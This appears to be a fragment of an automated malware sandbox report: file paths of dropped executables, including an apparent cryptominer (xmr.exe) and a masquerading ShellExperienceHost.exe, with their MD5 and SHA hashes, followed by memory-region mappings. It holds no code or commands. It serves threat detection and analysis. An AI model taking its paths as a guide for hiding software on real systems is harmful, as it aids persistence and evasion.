SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\services32.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\services64.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Users\Admin\AppData\Roaming\services64.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Users\Admin\AppData\Roaming\xmr.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Users\Admin\AppData\Roaming\xmr.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\fonthostSvc\5R3FFGftzpp.vbeMD5
cb60c41590dc32740e8923ba0cb6df97
SHA1aabc007b611df20e79fceee539ef63e7f2754304
SHA256c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2
SHA512a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da
-
C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.batMD5
7245c594f9448bae4a79764fb6897e25
SHA11eb300765111494f6c7049b5abbbb0e5725b39aa
SHA2564fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5
SHA51226c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8
-
C:\fonthostSvc\fonthostSvcIntodhcp.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\fonthostSvc\fonthostSvcIntodhcp.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\fonthostSvc\fonthostSvcIntodhcp.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\fonthostSvc\fonthostSvcIntodhcp.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
memory/8-144-0x0000000000000000-mapping.dmp
-
memory/60-141-0x0000000000000000-mapping.dmp
-
memory/64-216-0x0000000000000000-mapping.dmp
-
memory/740-165-0x0000000000000000-mapping.dmp
-
memory/768-139-0x0000000000000000-mapping.dmp
-
memory/964-224-0x0000000001080000-0x00000000010A0000-memory.dmpFilesize
128KB
-
memory/964-222-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/964-223-0x00000001402EB66C-mapping.dmp
-
memory/964-227-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/964-228-0x00000000010B0000-0x00000000010D0000-memory.dmpFilesize
128KB
-
memory/964-229-0x00000000010E0000-0x0000000001100000-memory.dmpFilesize
128KB
-
memory/1052-157-0x0000000000000000-mapping.dmp
-
memory/1524-212-0x0000000000D20000-0x0000000000D21000-memory.dmpFilesize
4KB
-
memory/1524-207-0x0000000000000000-mapping.dmp
-
memory/1524-221-0x00000000033C0000-0x00000000033C2000-memory.dmpFilesize
8KB
-
memory/1524-132-0x0000000000000000-mapping.dmp
-
memory/1540-187-0x0000000000000000-mapping.dmp
-
memory/1968-168-0x0000000000000000-mapping.dmp
-
memory/2084-143-0x0000000000000000-mapping.dmp
-
memory/2204-167-0x0000000000000000-mapping.dmp
-
memory/2208-138-0x000000001BAA0000-0x000000001BAA2000-memory.dmpFilesize
8KB
-
memory/2208-136-0x0000000000C20000-0x0000000000C21000-memory.dmpFilesize
4KB
-
memory/2208-133-0x0000000000000000-mapping.dmp
-
memory/2288-204-0x0000000000000000-mapping.dmp
-
memory/2288-156-0x0000000000000000-mapping.dmp
-
memory/2392-184-0x0000000000000000-mapping.dmp
-
memory/2412-174-0x0000000001700000-0x0000000001702000-memory.dmpFilesize
8KB
-
memory/2412-169-0x0000000000000000-mapping.dmp
-
memory/2412-176-0x00000000016E0000-0x00000000016E2000-memory.dmpFilesize
8KB
-
memory/2412-177-0x0000000001710000-0x0000000001712000-memory.dmpFilesize
8KB
-
memory/2412-178-0x000000001D000000-0x000000001D001000-memory.dmpFilesize
4KB
-
memory/2412-179-0x000000001E5B0000-0x000000001E5B1000-memory.dmpFilesize
4KB
-
memory/2412-175-0x0000000003160000-0x0000000003165000-memory.dmpFilesize
20KB
-
memory/2412-153-0x0000000000000000-mapping.dmp
-
memory/2420-185-0x0000000000000000-mapping.dmp
-
memory/2428-152-0x0000000000000000-mapping.dmp
-
memory/2660-164-0x0000000000000000-mapping.dmp
-
memory/2740-166-0x0000000000000000-mapping.dmp
-
memory/2740-142-0x0000000000000000-mapping.dmp
-
memory/2836-213-0x0000000000AC0000-0x0000000000AC1000-memory.dmpFilesize
4KB
-
memory/2836-206-0x0000000000000000-mapping.dmp
-
memory/2836-220-0x00000000018B0000-0x00000000018B2000-memory.dmpFilesize
8KB
-
memory/2844-181-0x0000000001230000-0x0000000001239000-memory.dmpFilesize
36KB
-
memory/2844-189-0x000000001C790000-0x000000001C792000-memory.dmpFilesize
8KB
-
memory/2844-118-0x0000000000000000-mapping.dmp
-
memory/2844-183-0x0000000001260000-0x0000000001261000-memory.dmpFilesize
4KB
-
memory/2844-126-0x00000000004A0000-0x00000000004A1000-memory.dmpFilesize
4KB
-
memory/2888-154-0x0000000000000000-mapping.dmp
-
memory/2888-190-0x0000000000000000-mapping.dmp
-
memory/2888-219-0x000000001CC20000-0x000000001CC22000-memory.dmpFilesize
8KB
-
memory/3064-114-0x0000000000000000-mapping.dmp
-
memory/3204-186-0x0000000000000000-mapping.dmp
-
memory/3204-205-0x0000000000000000-mapping.dmp
-
memory/3204-155-0x0000000000000000-mapping.dmp
-
memory/3304-151-0x0000000000000000-mapping.dmp
-
memory/3588-188-0x000000001CC40000-0x000000001CC42000-memory.dmpFilesize
8KB
-
memory/3588-115-0x0000000000000000-mapping.dmp
-
memory/3588-122-0x00000000006B0000-0x00000000006B1000-memory.dmpFilesize
4KB
-
memory/3588-180-0x0000000000EB0000-0x0000000000EB6000-memory.dmpFilesize
24KB
-
memory/3960-218-0x000000001D2B0000-0x000000001D2B2000-memory.dmpFilesize
8KB
-
memory/3960-191-0x0000000000000000-mapping.dmp
-
memory/3960-158-0x0000000000000000-mapping.dmp
-
memory/3960-162-0x000000001B370000-0x000000001B372000-memory.dmpFilesize
8KB
-
memory/3964-129-0x0000000000000000-mapping.dmp
-
memory/3984-140-0x0000000000000000-mapping.dmp
-
memory/4012-163-0x0000000000000000-mapping.dmp
-
memory/4044-150-0x000000001B870000-0x000000001B872000-memory.dmpFilesize
8KB
-
memory/4044-145-0x0000000000000000-mapping.dmp
-
memory/4044-217-0x0000000000000000-mapping.dmp